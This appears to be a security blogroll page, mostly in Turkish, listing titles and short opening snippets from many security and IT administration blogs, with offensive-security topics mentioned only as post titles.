10 Online Clothing Retailers With Awesome Return Policies - Buying clothes in a store—once the *only* way to shop—now seems almost antiquated. Why limit yourself to merely one designer, or even all the options ava...
8 yıl önce
Daren Matthews

EEM Script to check log messages and trigger email - Here’s a tip to become alerted when an interface is down (in this case a VPN tunnel). The script can be adapted to look for any pattern in the syslog and s...
8 yıl önce
Bilişim Hukuku Günlüğü - Leyla Keser

HIMSS 17 Konferansı - HIMSS 17 Konferansında, Siber Güvenlik ve Kişisel Verilerin Korunması oturumu, Kişisel Verileri Koruma Kurulu Başkanı Sayın Prof. Dr. Faruk BİLİR'in modera...
8 yıl önce
Window Security

V2V Communications security considerations - The future of vehicles, road infrastructure and driving are changing. We are progressing with vehicle-to-vehicle (V2V) and vehicle-to-infrastructure (V2I) ...
8 yıl önce
Exchange Server Articles

Configure a Mobile Device Mailbox Policy for Exchange Server - This article explains how to use mobile device mailbox policies to force mobile devices to comply with your organization’s security standards.
8 yıl önce
Ethical Hacking | Blog

How to Install SugarCRM on CentOS 7 in Simple Steps - Our tutorial for today is How to Install SugarCRM on Centos 7 in Simple Steps. SugarCRM Community Edition is a free and open source web-based customer re...
8 yıl önce
Ethical Hacking Tutorials

How to Bypass Windows AppLocker - Hello, today we will talk about Applocker bypass techniques in a Windows environment. What is Applocker, how does it protect systems, and more importantl...
8 yıl önce
Aman Dhally - Blog

Use Powershell to find the difference between two dates. - He was writing a Powershell script. The function of the script was to do a comparison of days pass since the file have been created.He stuck while creating...
8 yıl önce
Syslogs - Cagri Ersen - Blog

Creating Docker Swarm Cluster From Scratch - The new version of Docker (1.13) has many new features and for a container orchestration platform some of the essential features like secrets, stack deploy...
8 yıl önce
Emrullah Akdemir - Blog

Etik Hacker Sızma Testi Eğitimi - Web Application Pentest - Selçuk Üniversitesi Web Uygulamaları Sızma Testi Başarı Sertifikası Uzun zamandır yazmadığım blogumdan merhabalar =) Önceki yıllarda farklı bir isimde h...
8 yıl önce
Tuts 4 You

Obsidium 1.5.x.x (Unpacking) - A quick unpacking tutorial covering Obsidium 1.5.x.x builds. Example unpackme file of Obsidium 1.5.2 Build 11 included.
8 yıl önce
Still Passing the Hash

Password Maths Hurt the Brains - Every now and again I find myself figuring out the answers to some math questions related to passwords. The answer usually revolves around me writing the ...
8 yıl önce
Mehmet Ince - Blog

Hangi VPN Firmasını Kullanmalı ? Neden NordVPN kullanmaya başladım ? - Merhaba, Bundan yaklaşık 2 yıl kadar önce Mart 2014 yılında ülkemizde Twitter engellenmişti. Şimdilerde son derece alışık olduğumuz bu durum vakti zamanınd...
8 yıl önce
Petros Andreou - Blog

Yahoo Flaw Allowed Hackers to Read Anyone's Emails - Yahoo has patched a critical security vulnerability in its Mail service that could have allowed an attacker to spy on any Yahoo user's inbox. Jouko Pynnö...
8 yıl önce
Enpedi-Windows 7

Windows 7: "Güncelleştirmeler Denetleniyor" Ekranında Takılı Kalıyorsunuz! - *Windows 7* ile ilgili sık karşılaşılan hatalardan biri de güncelleştirmeleri denetlerken bu ekranda takılı kalmanız ve ilerleyememeniz. Doğal olarak ger...
8 yıl önce
Memory Forensics

Bringing together the DFIR Industry and Academia at DFRWS 2017 - I am happy to announce that I have joined the 2017 DFRWS organizing committee. My role for this conference is to bring industry researchers and practitione...
8 yıl önce
VoIP/UC Security Blog

Links to recent TDoS articles - 11/03/2016 - The day the 911 network stood still http://www.networkworld.com/article/3137526/security/the-day-the-911-network-stood-still.html 10/24/2016 -...
8 yıl önce
Liatsis Fotis | Blog

Undetectable Metasploit WAR - A possible attack path during a penetration test is having access to the administrative console of a JAVA Application Server (like WAS, JBOSS and Tomcat) ...
8 yıl önce
Christopher Truncer - Blog

Receiving Text Messages for your Incoming Beacons - Whether it be through phishing, or some other means, waiting for your incoming beacons can be an anxious moment. Every time I send off phishing e-mails, I...
9 yıl önce
Ugur Demir - Blog

Nerede Kalmıştık..! - Merhaba, İlk webcastimi 2014 yılında Exchange üzerine vermiştim. 2015 yılında ise ilk sunumumu gerçekleştirmiştim. Bu sene iş yoğumluğum nedeniyle etkinli...
9 yıl önce
Hackings.Org

Sitedeki sorunlar bilmem ne - JavaScriptlerden biri bumladigi icin gorsellik biraz kaymis. Temanin dosyalari external disklerden birisinde vardi fakat scripti upload edebilecegim gayri ...
9 yıl önce
Luiz Firmino - Blog

2016 Gartner Magic Quadrant for Security Information and Event Management -
9 yıl önce
Pentest - Blog

PowerShell PSRemoting Pwnage - Scenario You have obtained some level of admin creds, (local, domain or otherwise) to a windows server/domain, there is no RDP. There is however the WinRM ...
9 yıl önce
MSDN - Blog

Somasegar's blog - Site Home - MSDN Blogs - Search all blogs. Search this blog. Sign in. Somasegar's blog Somasegar's blog Most Recent Most Comments. Team Foundation Server 2015 Now Available. Today,...
9 yıl önce
Deb Shinder - Blog

Ransomware just keeps on coming - Dominates malware samples in 2016 Q2
9 yıl önce
Network Pentest - Firat Celal Erdik

Rootkit Geliştirmenin Temelleri-II - Windows işletim sisteminde hem kullanıcı seviyesinde(user level) hem de çekirdek seviyesinde(kernel level) hook işlemi yapılabilir. Hook işlemi sistemin v...
9 yıl önce
George Chetcuti - Blog

LepideAuditor Suite 16.3 – now with File Server Current Permission Reporting - Lepide launched version 16.3 of the popular LepideAuditor Suite. The updated version now features File Server Current Permission Report for the Shared fold...
9 yıl önce
Bilgi Güvenliği Akademisi | BGA

Siber Güvenlik Dünyasına AR-GE Desteği - Bilgi Güvenliği AKADEMİSİ olarak ana hedeflerimizden biri içinde yer aldığımız siber güvenlik sektörünün yetişmiş eleman sayısının artmasına destek olmak...
9 yıl önce
New Delhi PowerShell User Group.

PowerShell cmdlet of the Day : Clear-RecycleBin - Do you love sweets? I love them. And there are some Powershell cmdlets those are tooo sweet like a sweet. If you want to clear/ empty your recycle bin, t...
9 yıl önce
Onur Alanbel - Blog

Siber Güvenlik Etkinliklerine Başvuru Tecrübelerim - Yaklaşık bir sene önce yaptığım özgün çalışmalarla Türkiye’deki siber güvenlik etkinliklerine istisnasız sunum önerisi gönderme kararı aldım. Bu kararı ald...
9 yıl önce
Bekir Yalcinkaya - Blog

How Can I Replace the Certificate of RDP (Remote Desktop)? - Uzak Masaüstü (RDP) bağlatınlarında özel bir sertifika makamında üretilen veya ticari olarak satın alınan bir sertifikayı kullanabilmek için aşağıdaki adım...
9 yıl önce
Journey Into Incident Response

Blaming Others - As we marched across the parade deck from the side we looked as one. The sound of about 70 Marines' heels hitting the pavement but sounded as one. The soun...
9 yıl önce
Offensive Security Blog V2.0

CheatSheet: Powershell -
9 yıl önce
Threat Thoughts

Cash Payment Machine - Agency Bill – Correcting A Cash Payment.wmv Reds slip in the only league the owners truly care about but riches await – unitedrant.co.uk Unitedrant.co.uk...
9 yıl önce
Erdem Cilingiroglu - Blog

WordPress 4.4 Sürümü Yayında - Merhabalar, Yeni bir duyuru ile karşınızdayım. WordPress 4.4 sürümü, Jazz Müzisyeni Clifford Brown’a ithaf edilerek yayınlandı. WordPress Yönetim Paneline ...
9 yıl önce
Hüseyin Sevin - Blog

IIS Sunucularda http isteğini https e Force Etme - Bu makalemizde web sunucumuza gelen http isteklerini https’e nasıl force edeceğimize değineceğiz. Uygulamalarımız ve web sitemiz için bu işlem aslında son ...
9 yıl önce
Catch in Security - Blog

[DeepSec 2015]50 Shades of WAF - Mastodon 50 Shades of WAF – Exemplified at Barracuda & Sucuri Ashar Javed (Hyundai AutoEver Europe GmbH) This talk will present 50 (25*2) bypasses of Barra...
9 yıl önce
Sherif Eldeeb - Blog

Fixing “unresolved external symbols” when using NODEFAULTLIB in VisualStudio 2015 - [TL;DR] Do either of the following: Installing an older visual studio version next to VS2015 allows compiling “like old times” from within VS2015 … Add new...
9 yıl önce
My Other PC is a cloud

Now on AskDS! - It is my sincere honor to inform you that you may now also find me waxing poetic on the AskDS blog, Microsoft's official enterprise support blog for AD D...
9 yıl önce
Ryan Ries - Blog

Now on AskDS! - It is my sincere honor to inform you that you may now also find me waxing poetic on the AskDS blog, Microsoft's official enterprise support blog for AD D...
9 yıl önce
Mustafa Yilmaz - Blog

Linux Sunucular İçin Türkiye Yaz Saati Uygulaması Değişikliği - Bilindiği üzere ülkemizdeki seçimler nedeniyle yaz saati uygulamasında güncellemeye gidilmiştir. Yapılan bu güncelleme sonrasında sunucu sistemlerde yama g...
9 yıl önce
Forensic Artifacts

Mac OS X User Preference Settings - Author Name Pasquale Stirparo, @pstirparo Submission Title Mac OS X User Preference Settings Artifact Description Num. 1 is the directory containing user p...
9 yıl önce
Yakup Korkmaz - Blog

Installing Numpy on Windows 7 / 8 with Python 2.7 (Unable to find vcvarsall.bat) - Installing Numpy is as easy as running the command below: pip install numpy However, If you don’t have a C/C++ compiler installed, you can get the followin...
10 yıl önce
Lifeoverip - Blog

Siber Güvenlik Yaz Kampı ’15 24-29 Ağustos 2015 / Ankara - Cisco firmasının 2014 yılı güvenlik raporuna göre önümüzdeki 5 yıl için dünya genelinde 1 milyon siber güvenlik uzmanına ihtiyaç vardır. Türkiye için siber...
10 yıl önce
Merve Cevizci | Blog

Oracle Data Pump ile ASM’e export/import - Merhabalar, Bu yazımda ASM diskleri üzerinde export/import işlemlerini nasıl gerçekleştireceğimizi anlatacağım. Aslında klasik file system üzerinde yaptığı...
10 yıl önce
Michael's meanderings

Clustersize, Blocksize, and Allocation Unit Size - Depending on where you see the terms used in Windows, you may see different names for the same thing. The clustersize of a volume, the blocksize of a vol...
10 yıl önce
Cozumpark - Windows 8

Windows 8 Aile Koruması - Dünya var olduğu günden bu yana iyilik ve kötülük savaş halinde. İnternet gibi muhteşem bir mecrayı bulan ve insanlığın hizmetine sunan iyi insanlar, muh...
10 yıl önce
Certified Ethical Hacker | TR

Cypsec’15 Uluslar Arası Siber Güvenlik Konferansı - Bu yıl 15-16-17/04/2015 tarihlerinde Cypsec Uluslar Arası Siber Güvenlik Konferansı, bir çok değerli teknik uzman ve siber güvenlik sektörünün ürün gelişt...
10 yıl önce
The Invisible Things Lab's Blog

Migrating my blog out of Blogger... - I've migrated this blog to a new "platform". The new blog is now hosted here. This post (via new blogging platform) explains the reasons of migration and ...
10 yıl önce
SpiderLabs - Blog

TrustKeeper Scan Engine Update – February 4, 2015 - The latest update to the TrustKeeper scan engine that powers our Trustwave Vulnerability Management product (including both internal and external vulnerabi...
10 yıl önce
In pursuit of happiness - Blog

Easy Tricks for JPA, Spring and Hibernate - Java frameworks have evolved, making us write less code and ship faster! Here, I will discuss some neat tricks to address common concerns in Hibernate an...
10 yıl önce
SecuriTeam - Blog

Developing an IR Process and Team - In our world today, we have an abundance of many things, among which are –unexpected events. Falling meteorites, terrorist attacks, hacktivist demonstratio...
10 yıl önce
Umut Simsek - Blog

Her ak sakallı dede,her uzun ve karışık parola da yeterince güvenli değil - Karışıklığın sıralaması - Excel'den oldum olası nefret ederim. Excel'e bu kadar bel bağlayan,Excel olmasa ne yapacağını, işlerini-projelerini nasıl yürüteceğini şaşıran organizasy...
10 yıl önce
Command Line Kung Fu

Episode #180: Open for the Holidays! - Not-so-Tiny Tim checks in with the ghost of Christmas present: I know many of you have been sitting on Santa's lap wishing for more Command Line Kung Fu. ...
10 yıl önce
SecurityLearn - Blog

Get Practical mobile forensics book for just $5 now! - Packt Publishing will be celebrating the holiday season with $5 offer. From Thursday 18th December, every eBook and video will be available on the publi...
10 yıl önce
Cagatay Isikci - Blog

Belirli Bir Portta Çalışan Uygulamayı Bulmak - Microsoft ve Unix tabanlı sunucularda, uygulamalar ilgili portlar üzerinden çalışırlar. Bu gönderide, belirli bir portta hangi uygulamanın çalıştığını bulm...
10 yıl önce
Pentest Geek

Phishing Frenzy: SSL Support on Rails 4 with Syntax Highlighting - It’s been a little over a year since I started phishing full time with Phishing Frenzy and there is no looking back now. The project has really come a lo...
10 yıl önce
SignalSEC

SEDNIT Espiyonaj Ekibinin Antivirüs Atlatma Hileleri - Bir APT ve Siber Istihbarat Saldırısının Anatomisi adlı yazımızda bahsettiğimiz SEDNIT siber espiyonaj grubunun operasyonları hala Read More
10 yıl önce
Ismail Saygili - Blog

Python Simple PhpBug Finder - Merhaba Arkadaşlar, Farkındayım uzun zamandır bloga yazı yazmıyorum ancak mazeretim var, uzun süredir iş yoğunluğum mevcut. Bu yüzden maalesef pek fırsatım...
10 yıl önce
Open Security Research

A Brief Overview of the Google Authenticator - By Deepak Choudhary. Many application providers are considering implementing a more robust login mechanism to their applications as single layer authentica...
10 yıl önce
Just Ask Weg

Workarounds to Workarounds (and some hints & reminders) - Every now and then, I get email from readers who have difficulties, and some areas come up more often. I also learn a few things as time goes by, and
10 yıl önce
The Digital Standard

One Step Ahead Part 3 - One Step Ahead Part 3 is out on the Nuix blog, Unstructured!
10 yıl önce
knox - Manoj Kumar - Blog

Bash-Bug Penetration Testing - Anatomy of Shelllock - A new security vulnerability known as the Bash or Shellshock bug could spell disaster for major digital companies, small-scale Web hosts and even Internet...
10 yıl önce
Forensicaliente

It's a Groovy Kind of Risk - This year at the SANS DFIR Summit in Austin, TX I had the distinct honor and pleasure of presenting a talk entitled *To Silo, or Not to Silo: That is the...
11 yıl önce
Dav Nads - Blog

4n6time v.06 - minor update - I posted a new version of 4n6time for Windows only. Download link here: https://googledrive.com/host/0B30H7z4S52FleW5vUHBnblJfcjg/4n6time/ Not many signifi...
11 yıl önce
clymb3r - Blog

Cracking Open PowerShell’s Constrained Runspace - Recently at the PowerShell Summit, Lee Holmes and I did a talk on PowerShell security. One of the demonstrations we did showed how to find and exploit a co...
11 yıl önce
Obscuresec - Blog

Modifying MAC properties with PowerShell - Laziness is the demise of Red Team engagements. Whether it is writing PsExec to a user's desktop or writing other arbitrary binaries to disk, not being car...
11 yıl önce
Metcorp Consulting

Blog Move - I have accepted a position with another company, so this blog is moving. The new blog location is: ADSecurity.org Comments posted on this blog may not be a...
11 yıl önce
Hidden Illusion

Rewriting/anonymizing artifacts - This has been ported over to my GitHub site and is not longer being maintained here. For any issues, comments or updates head here.Situation Have you ever ...
11 yıl önce
Turgay Sahtiyan - Blog

SQL Server Latch Contention - *Latch Contention nedir?* Latch’ler, in-memory structure’daki data, index page ya da B-Tree’nin leaf level’indaki page’ler gibi internal objelerdeki tuta...
11 yıl önce
Zone-H - News

Dedicated to all the hackers - Pho3nix (Roulette Cinese) - We finally concluded the Hacker Visual Contest through which we collected videoclips and artwork from the hacker world which we used to assemble the offici...
11 yıl önce
Security-Shell

WAVSEP 2014 Web Application Scanner Benchmark - The *2014* WAVSEP web application scanner benchmark has been published Currently includes new products that were tested for the first time (ScanToSecure, ...
11 yıl önce
Mike Kline - Blog

Complete Windows 2012 & 2012 R2 Documentation - I generally don't write posts that link to docs but this one is really good and I haven't seen a lot of traffic on it. Microsoft has released the entire co...
11 yıl önce
The Digital4rensics Blog

New Endeavors Ahead - This weekend, I had a fleeting thought about how long it had been since I posted here, but I suppose I didn’t realize it had been quite that long. Long sto...
11 yıl önce
Dig4n6

VDI-in-a-Box Analysis Results - Despite the fact that my capstone thesis was complete over three months ago, it’s been a struggle to make this post. That being said, hopefully this blo...
12 yıl önce
Security Obscurity - Blog

Styxy Cool Exploit Kit: One Applet to Exploit All Vulnerabilities - Styxy Cool Exploit Kit is a particular kit because it is a "merge" between Cool and Styxy Exploit Kit. Here we are going to cover only Java related exploit...
12 yıl önce
MNIN Security Blog

How to DoS Authenticode Signature Verification and Spoil Live Forensics with Echo - A while back I was looking into some internals of Microsoft's Authenticode and found a way to prevent signature verification by creating a specially named ...
12 yıl önce
Canberk Bolat - Blog

MS12-076 Excel SerAuxErrBar Heap Overflow Vulnerability - There was a Heap Overflow vulnerability (CVE-2012-1885) in Excel while parsing SerAuxErrBar structure from xls (Excel's old binary format) files. So I deci...
12 yıl önce
Sistem Yönetimi ve Bilgi Güvenliği - Blog

Active Directory Yonetim Proseduru - Active Directory yonetim proseduru, AD ortamındaki kullanıcı hesapları, gruplar ve diğer AD nesnelerinin nasıl oluşturulacağını, yönetileceğini ve bu nesne...
12 yıl önce
Sploited

SANS Forensic Artifact 7: Last Visited MRU - Welcome to 2013. I was fortunate to have some free time towards the end of last year which allowed me to catch up on some of my side projects such as the M...
12 yıl önce
Hot Security News

- Symantec Corp. today announced the findings of its 2012 Information Retention and eDiscovery Survey which examined how enterprises manage their ever-growin...
12 yıl önce
Mahmet Esat - Blog

Hakkimda Sayfasini Guncelledim :) - Merhaba, Uzun suredir birseyler yazmaya firsat bulamiyorum. Gerek sanal gerekse reel yogunluktan dolayi konu anlatimi ve video gibi icraatlerden uzak kaldi...
12 yıl önce
Active Directory - FAQ

Steps to create a Clone of Domain Controller in Windows 2012 - *1)* Make sure your hypervisor generates VM-Generation-ID. *2)* Make sure your PDC FSMO runs on Windows 2012. - BTW you cannot clone yo...
12 yıl önce
Cloud Security

Happy New Year from the Cloud Security blog - [image: Wishing you Happy Cloud Fiddling in 2013] Hello again and Happy New Year! I’ve just updated my About page ready for 2013. After a break from blo...
12 yıl önce
Ag Guvenligi - SGE

Kullanıcıların Sadece SCP/SFTP Yapacak Şekilde Kısıtlanması - Linux sistemlerde güvenli dosya transferi için SSH sunucu üzerindeki scp/sftp özelliği sık sık kullanılmaktadır. SSH kullanıcı yetkilendirmesinde işletim s...
12 yıl önce
Dr. Fu's Security Blog

Malware Analysis Tutorial 34: Evaluation of Automated Malware Analysis Tools CWSandBox, PeID, and Other Unpacking Tools - *Learning Goals*: 1. Understand Design Principles of Automated Malware Analysis Systems 2. Hands-on Experiences with CWSandBox and Packer Identificat...
12 yıl önce
Ağ Güvenliği Akademisi - Blog

Siber Ordular Dosyası - Büyük Takip 22.06.2012 Trt Haber - Televizyonda ağ güvenliği konusunda ayrıntılı bir program bulmak pek mümkün değil. Büyük Takip adlı haber programında Hüseyin Yüce, Hüzeyfe Önal gibi tan...
13 yıl önce
Bernardo Damele - Blog

Data retrieval over DNS in SQL injection attacks - We have recently implemented *data retrieval over DNS* in sqlmap. This data exfiltration technique adds up to the six existing techniques already implement...
13 yıl önce
Pentester - Sudhir

Basic Information Gathering of Analysis on Malware (Part 1) - *Basic Information Gathering of Analysis on Malware* (*Part 1*) -------------------------------------------------------------------- Malware (spyware,Rootk...
13 yıl önce
Exploit Monday

Stealth Alternate Data Streams and Other ADS Weirdness - I was reading an article on MSDN regarding the naming of files, paths, and namespaces[1] and I discovered some interesting peculiarities regarding the nami...
13 yıl önce
Bilisim ve Sistem Guvenligi - Blog

Şifresiz Bilgisayarlar: Anahtar Kapının Üzerinde Ben Evde Yokum - Teknolojinin giderek yaygınlaşmasıyla birlikte artan bilişim suçlarına karşı uzmanlar vatandaşları uyardı. Bireylerin cep telefonları ve bilgisayarlarında ...
15 yıl önce
Eyup Celik - Blog

-
Hackinsight.org

-
Harvard | Cyber Security

-
Raihan Al-Beruni - Microsoft Guru

-
A Fistful of Dongles

-
The Penetration Testing Execution Standard

-
Not So Secure

-
IOC: Forensic Artifacts

-
Windows - All Computers

-
Yesu Chelva - Blog

-
Necati Demir - Blog

-
Caner Koroglu - Blog

-
Technet | Blog

-
Biznet Bilisim Bilgi Guvenliği Notlari

-
Techorganic

-
BT Yonetimi 2.0 - Blog

-
Erdem Alparslan | Blog

-
BackTrack Linux

-
Religion Hacking - Blog

-
W. Mark Brooks | Blog

-
Mandiant - Blog

-
Barkin Kilic - Blog

-
Commtouch Café

-
HackTalk

-
Dave Harris - Blog

-
Securelist - Blog

-
V.P.Prabhakaran - Blog

-
1337day

-
Malware Analysis Blog

-
Güvenli Yazılım Reçeteleri

-
FishNet - 6Labs | Blog

-
Blog - Haider M. al-Khateeb

-
Dark Reading

-
Programming For Us - Security

-
Network Security Podcast

-
System Forensics

-
Onur Yuksektepeli - Blog

-
Microsoft Windows - Blog

-
Point2Security

-
AlienVault Labs - Blog

-
Windows IT Pro

-
Coresec

-
Security Weekly

-
Cyber News

-
The H Security

-
TrustedSec- Blog

-
TechRepublic - Blog

-
Bluebox - Blog

-
John Policelli - Blog

-